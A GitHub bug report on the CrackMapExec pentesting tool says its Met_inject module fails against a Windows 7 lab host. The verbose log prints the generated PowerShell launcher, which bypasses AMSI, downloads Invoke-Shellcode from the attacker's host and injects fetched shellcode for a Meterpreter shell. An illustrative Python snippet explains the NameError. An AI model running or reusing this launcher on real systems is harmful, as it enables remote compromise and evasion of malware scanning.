byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

Met_inject Module Fails to inject Meterpreter shell #240

Closed GhostNaix closed 6 years ago

GhostNaix commented 6 years ago

Steps to reproduce

Execute CrackmapExec with MET_inject module inside a pipenv wrapper environment

Command string used

cme --verbose smb 192.168.1.2 -u HACK -p 1 -M Met_inject -o LHOST=192.168.1.5 LPORT=1111

CME verbose output (using the --verbose flag)

DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': None,
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'Met_inject',
 'module_options': ['LHOST=192.168.1.5', 'LPORT=1111'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['1'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.1.2'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['HACK'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: https
SMB         192.168.1.2     445    HACK-PC          [*] Windows 7 Ultimate 7601 Service Pack 1 x64 (name:HACK-PC) (domain:HACK-PC) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=plaintext, domain=HACK-PC, username=HACK, password=1, groupid=None, pillaged_from=None) => None
SMB         192.168.1.2     445    HACK-PC          [+] HACK-PC\HACK:1 (Pwn3d!)
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.5:443/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.1.5:1111/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}

$functions = {
    function Command-ToExecute
    {
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.5:443/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.1.5:1111/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes
    }
}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{
    $job = Start-Job -InitializationScript $functions -ScriptBlock {Command-ToExecute} -RunAs32
    $job | Wait-Job
}
else
{
    IEX "$functions"
    Command-ToExecute
}

DEBUG Error executing command via wmiexec, traceback:
Traceback (most recent call last):
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run
    result = self._run(*self.args, **self.kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 108, in __init__
    connection.__init__(self, args, db, host)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in __init__
    self.proto_flow()
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 75, in proto_flow
    self.call_modules()
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 105, in call_modules
    self.module.on_admin_login(context, self)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules/met_inject.py", line 65, in on_admin_login
    connection.ps_execute(launcher, force_ps32=True)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 445, in ps_execute
    return self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 81, in _decorator
    output = func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 394, in execute
    logging.debug(format_exc())
NameError: global name 'format_exc' is not defined
Fri Mar  2 22:47:53 2018 <Greenlet at 0x7f6bb721ecd0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0x7f6bb8197758>, '192.168.1.2')> failed with NameError

CME Version (cme --version)

(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# cme --version
4.0.1dev - Bug Pr0n

OS

(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:    kali-rolling
Codename:   kali-rolling
(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# uname -a
Linux HacknetOS 4.14.0-kali3-amd64 #1 SMP Debian 4.14.13-1kali1 (2018-01-25) x86_64 GNU/Linux
(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# 

Target OS

Windows 7 SP1 x64

Detailed issue explanation

It seems that the module fails to spawn a Meterpreter shell on the remote system after successful SMB authentication.
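The traceback above ends in a NameError raised from inside the exception handler in smb.py (line 394 calls `format_exc()` without it ever being imported), so whatever error wmiexec actually hit is never written to the debug log and the greenlet dies with the wrong exception. The following is an added illustration, not CrackMapExec's own code: a stand-in handler with the same defect beside the same handler with `traceback.format_exc` imported, using a constructed sample exception in place of the real wmiexec failure.

```python
"""Added example (not CrackMapExec code): a NameError inside an except
handler hides the original exception; importing format_exc fixes it."""
import logging
import traceback

logging.basicConfig(level=logging.DEBUG)


class SampleExecError(Exception):
    """Constructed stand-in for whatever wmiexec raised in the report."""


def run_remote_command_stub():
    # Constructed failure: represents the real execution error whose
    # message never reached the log in the traceback above.
    raise SampleExecError("wmiexec failed (constructed sample error)")


def execute_broken():
    """Same shape as the failing handler: format_exc is referenced but was
    never imported, so the handler itself raises NameError and the
    SampleExecError that triggered it is lost."""
    try:
        run_remote_command_stub()
    except Exception:
        logging.debug(format_exc())  # noqa: F821 - deliberately undefined
        return None


def execute_fixed():
    """The same handler with the missing import supplied. The original
    error is logged and its class name plus the formatted traceback are
    returned so the caller (or a test) can see what really went wrong."""
    try:
        run_remote_command_stub()
    except Exception as exc:
        formatted = traceback.format_exc()
        logging.debug(formatted)
        return type(exc).__name__, formatted


def classify(handler):
    """Run a handler and report what escaped it: the handler's own return
    value, or a 'masked:' marker when the handler crashed on NameError."""
    try:
        return handler()
    except NameError as exc:
        return "masked: " + str(exc)


if __name__ == "__main__":
    print(classify(execute_broken))   # masked: name 'format_exc' is not defined
    print(classify(execute_fixed)[0])  # SampleExecError
```

The practical point for anyone triaging this report: until the import is fixed, the log cannot say why the wmiexec execution failed, so the NameError should be read as "the error path is broken", not as the root cause of the module failure.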

byt3bl33d3r commented 6 years ago

Duplicate of #223. Please track this issue there.

Closing.